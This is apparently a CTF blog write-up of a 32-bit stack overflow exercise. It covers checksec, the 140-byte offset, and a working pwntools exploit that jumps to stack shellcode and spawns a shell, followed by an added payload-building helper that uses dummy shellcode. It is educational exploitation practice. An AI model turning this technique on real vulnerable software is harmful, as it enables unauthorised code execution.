PWN stack overflow basic exercise - 2
2022-07-23 06:14:00 【Mokapeng】
Challenge files: see "pwn stack overflow basic exercises ——1", which collects the challenge binaries for every exercise in this blog series.
pwn1
First run checksec: no mitigations are enabled, which makes this one easy.
Load level1 into IDA. buf sits at ebp-0x88, but up to 0x100 bytes can be written into it, so there is an obvious stack overflow.
There is no backdoor function to jump to, but because this challenge has NX turned off the stack is executable, so we can supply our own shellcode.
The plan is straightforward: store the shellcode in buf, then use the overflow to overwrite the return address so that execution lands on the shellcode.
First, debug dynamically to confirm the overflow distance.
Then build the payload: shellcode plus padding fill 136+4=140 bytes (0x88 up to the saved ebp, plus 4 bytes for the saved ebp itself), followed by the return address, which is the address of buf. ASLR is on, so buf's address changes on every run, but the program prints the address of buf for us, which is very convenient.
The exploit, exp.py:
```python
from pwn import *
context(log_level='debug', arch='i386', os='linux')
# 32-bit /bin/sh shellcode generated by pwntools
shellcode = asm(shellcraft.sh())
io = process('./level1')
# The program prints buf's address; cut the 0x... value out of that line
text = io.recvline()[14:-2]
buf_addr = int(text, 16)
# 140 bytes of shellcode plus NOP padding (0x88 to saved ebp + 4), then return into buf
payload = shellcode + b'\x90' * (140 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()
```
\x90 is the NOP instruction: executing it does nothing and causes no error, so it is suitable as padding.
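The one-line payload above hides a failure mode: if the shellcode is longer than 140 bytes, `b'\x90' * (140 - len(shellcode))` silently becomes empty and the return address no longer lands on the saved return slot; the fixed slice `[14:-2]` likewise breaks as soon as the banner text or line ending differs. The helper below is an added example, not code from the original post: it uses the same 0x88+4 layout from the write-up, parses the leaked address with a regex instead of a fixed slice, checks that the shellcode fits, and verifies the layout. The leaked line and the placeholder shellcode bytes are constructed sample input.

```python
import re
import struct

# Offsets from the write-up: buf is at ebp-0x88, then 4 bytes of saved ebp.
BUF_TO_EBP = 0x88
RET_OFFSET = BUF_TO_EBP + 4   # 140: distance from buf to the saved return address


def parse_leaked_addr(line: bytes) -> int:
    """Extract the 0x... address the program prints for buf.

    A regex is more robust than a fixed slice such as line[14:-2], which breaks
    as soon as the banner text or the line ending changes.
    """
    m = re.search(rb"0x([0-9a-fA-F]+)", line)
    if m is None:
        raise ValueError(f"no hex address in leaked line: {line!r}")
    return int(m.group(1), 16)


def shellcode_fits(shellcode: bytes, ret_offset: int = RET_OFFSET) -> bool:
    """True when the shellcode fits before the saved return address."""
    return len(shellcode) <= ret_offset


def build_payload(shellcode: bytes, buf_addr: int, ret_offset: int = RET_OFFSET) -> bytes:
    """Lay out shellcode + NOP padding + return address, as in the write-up.

    Raises instead of silently emitting a broken payload when the shellcode
    is too long or the address is not a valid 32-bit value.
    """
    if not shellcode_fits(shellcode, ret_offset):
        raise ValueError(f"shellcode is {len(shellcode)} bytes, only {ret_offset} fit before the return address")
    if not 0 <= buf_addr <= 0xFFFFFFFF:
        raise ValueError("buf_addr must be a 32-bit address")
    padding = b"\x90" * (ret_offset - len(shellcode))   # NOP filler
    return shellcode + padding + struct.pack("<I", buf_addr)   # p32 equivalent


def check_layout(payload: bytes, buf_addr: int, ret_offset: int = RET_OFFSET) -> bool:
    """Verify the 4 bytes that overwrite the saved return address hold buf_addr."""
    if len(payload) != ret_offset + 4:
        return False
    return struct.unpack("<I", payload[ret_offset:ret_offset + 4])[0] == buf_addr


# Constructed sample input: not real program output and not real shellcode.
SAMPLE_LEAK = b"Something is at 0xffffd34c!\n"
DUMMY_SHELLCODE = b"\xcc" * 44   # int3 filler standing in for asm(shellcraft.sh())
```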